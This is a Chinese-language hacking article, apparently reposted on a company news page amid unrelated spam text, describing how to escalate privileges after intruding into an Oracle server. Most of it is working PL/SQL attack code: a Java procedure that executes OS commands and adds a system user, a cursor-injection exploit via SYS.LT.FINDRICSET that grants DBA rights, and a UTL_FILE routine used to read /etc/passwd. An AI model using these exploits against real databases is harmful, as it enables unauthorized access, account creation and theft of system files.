已完本玄幻小说排行榜,大主宰天蚕土豆小说,重生之毒妃梅果小说

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案

Oracle服務器如何進一步的獲取權限

再進行入侵Oracle服務器的進一步來獲取權限時，我們需要快速的連接上Oracle服務器，此時你會發(fā)現(xiàn)，的情況有，連接之后不是dba權限，或不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升權限。

創(chuàng)新互聯(lián)主營贛縣網(wǎng)站建設的網(wǎng)絡公司,主營網(wǎng)站建設方案,app軟件定制開發(fā),贛縣h5重慶小程序開發(fā)公司搭建,贛縣網(wǎng)站營銷推廣歡迎贛縣等地區(qū)企業(yè)咨詢

3.運行SELECT UTL_HTTP.request(‘http://xxxxxxxxxxx/login.jsp’) FROM dual 后發(fā)現(xiàn)oracle服務器不能連接網(wǎng)絡。

幸運的是，

運行

 
 
 
  
  
  create or replace function Linx_Query (p varchar2) 
return number authid current_user is begin execute 
immediate p; return 1;end;

成功!這個用戶具有create proceduce權限。

此時馬上想到創(chuàng)建java擴展執(zhí)行命令：

 
 
 
  
  
  create or replace and compile java source named 
“LinxUtil” as import java.io.*; public class LinxUtil extends Object 
{public static String runCMD(String args) {try{BufferedReader myReader= 
new BufferedReader
(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); 
String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+” 
“;myReader.close();return str;} catch (Exception e){return e.toString();}}}  
  
  
  begin dbms_java.grant_permission
(‘PUBLIC’, ‘SYS:java.io.FilePermission’, ‘<>’, ‘execute’ );end;  
  
  
  create or replace function LinxRunCMD(p_cmd in varchar2) 
return varchar2 as language java name 
‘LinxUtil.runCMD(java.lang.String) return String’  
  
  
  select * from all_objects where object_name like ‘%LINX%’  
  
  
  grant all on LinxRunCMD to public  
  
  
  select LinxRunCMD(‘cmd /c net user linx /add’) from dual

但是在第一步就卡住了，服務器由于某種未知原因不能創(chuàng)建java擴展!!

還好，我們還有UTL庫可以利用：

 
 
 
  
  
  create or replace function LinxUTLReadfile 
(filename varchar2) return varchar2 is  
  
  
  fHandler UTL_FILE.FILE_TYPE;  
  
  
  buf varchar2(4000);  
  
  
  output varchar2(8000);  
  
  
  BEGIN  
  
  
  fHandler := UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);  
  
  
  loop  
  
  
  begin  
  
  
  utl_file.get_line(fHandler,buf);  
  
  
  DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);  
  
  
  exception  
  
  
  when no_data_found then exit;  
  
  
  end;  
  
  
  output := output||buf||chr(10);  
  
  
  end loop;  
  
  
  UTL_FILE.FCLOSE(fHandler);  
  
  
  return output;  
  
  
  END;

UTL_FILE_DIR需要先用：

 
 
 
  
  
  CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

指定目。但運行后發(fā)現(xiàn)沒有權限。只好想辦法提權。

游標注射

老外寫了N個pdf介紹這技術，我精簡了代碼：

 
 
 
  
  
  DECLARE  
  
  
   
  
  
  MYC NUMBER;  
  
  
  BEGIN  
  
  
  MYC := DBMS_SQL.OPEN_CURSOR;  
  
  
  DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction; 
begin execute immediate 
”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);  
  
  
  DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  
  
  BEGIN SYS.LT.FINDRICSET
(‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,'x’); END;  
  
  
  raise NO_DATA_FOUND;  
  
  
  EXCEPTION  
  
  
  WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  
  
  WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);  
  
  
  END;

運行后重新連接就有dba權限了，簡單吧……

現(xiàn)在可以讀取文件了：

 
 
 
  
  
  CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;  
  
  
  select LinxUTLReadfile(‘passwd’) from dual

后面就簡單了，不寫了。上述的相關內容就是對入侵Oracle服務器進一步獲取權限的描述，希望會給你帶來一些幫助在此方面。

【編輯推薦】

在Oracle數(shù)據(jù)庫中使用PL操作COM對象
對聯(lián)機備份Oracle數(shù)據(jù)的解剖
Oracle動態(tài)Web開發(fā)實例演示
Oracle移植到mysql中，應注意的事項
Oracle進程中出現(xiàn)帶鎖狀況的解決

當前文章：Oracle服務器如何進一步的獲取權限
URL鏈接：http://m.fisionsoft.com.cn/article/dhpcoji.html

新聞中心

其他資訊